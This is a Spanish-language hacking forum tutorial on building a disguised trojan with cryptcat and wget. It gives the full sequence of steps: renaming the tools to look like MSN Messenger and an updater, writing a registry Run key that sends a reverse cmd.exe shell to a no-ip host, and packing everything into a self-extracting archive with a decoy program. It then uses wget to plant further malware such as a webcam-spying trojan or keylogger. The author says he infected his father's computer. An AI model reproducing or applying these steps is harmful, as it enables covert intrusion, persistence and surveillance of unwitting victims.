NOTA: Los programas que vamos a usar, junto con el manual del cual cojo las directrizes y amplio son de "Manual de Cryptcat I" de WHK
Antes de empezar con este tutorial, debemos de coger los materiales que emplearemos:
-
Para ver este enlace Registrate o Inicia SesionCRYPTCAT
-
Para ver este enlace Registrate o Inicia SesionWget
Lo primero de todo será cambiarles el nombre a los .exe, por si a la víctima le da por ver los procesos desde el admin de tareas (ctrl + allt+surp) lo vea como normales... les cambiaremos los nombres de la siguiente forma:
cryptcat.exe > msnmsgr.exe
wget.exe > update.exe
Tras haber hecho esto, creamos un .bat que se agregue al registro y que ponga la shell de la víctima. Antes de crear el batch, necesitaremos tener una cuenta no-ip para que se conecte la víctima ha nuestras DNS y así si cambiamos de IP, no perdamos la víctima

.
El código del batch puede ser el mismo que para nc, ya que cryptcat utiliza la misma sintaxis que nc, siendo la única diferencia que éste encripta los paquetes, así si nos sniffean la red verán los paquetes encriptados y no se coscaran de nada

. El batch lo ejecutaré cuando ya tenga la shell... y sería algo tipo:
@echo off
reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homepath%\update\msnmsgr.exe -d -e cmd.exe argeniversohack.no-ip.biz 28" /f > nul
exit
Ahora procedamos a crear un SFX con un programa, con el cryptcat y con el Wget (Que usaremos como backdoor).

Ahora ocultamos los archivos...

A continuación seleccionamos un icono para nuestro archivo SXF, y aceptamos.

Ahora nos deslizamos hasta la pestaña de comentarios y añadimos esto:
Setup=msnmsgr.exe -d -e cmd.exe
Setup=(PROGRAMA CEBO)
Y ponemos tantos Setup's como programas queramos que se ejecuten...
Mientras que enviamos nuestra trampa (previamente cambiandole el nombre y comprimiendolo) procedemos a ir a nuestro cmd y ponemos:
cryptcat -vv -L -p 28
Al final cuando la víctima ejecute nuestra trampa, tendremos acceso a su shell... =).
A parte de ya poder hacer lo que queramos, le tenemos backdorizado con el Wget. Ahora podemos descargar archivos a su PC sin que la víctima se entere. Para ello deberemos de buscar un hosting (tripod es el que yo uso porque me permite subir .exe) y uploadear el archivo que queramos introducir en la víctima. Y desde la shell de nuestra víctima pondremos (estando situados en la misma carpeta donde teníamos el wget):
update.exe -c -t0 http://www.PAGINAAQUI.com/ARCHIVOAQUI.exe
En mi caso, subí el server del turkojan, para poder ver la webcam de mi víctima, pero vosotros podeis subir lo que querais, como un keylogger creado por vosotros... simplemente lo ejecutais desde línea de comandos cuando os lo descargueis y vualá.
PD: El manual lo hize usando a The Last como ayudante, para que esto no fuera ilegal. Exceptuando la parte en la que subo el troyano etc, porque a el no se lo subí. Pero al ordenador de mi padre si que conseguí subir. De todas formas por privacidad omito las fotos en las que aparecen su info.
Byt3z.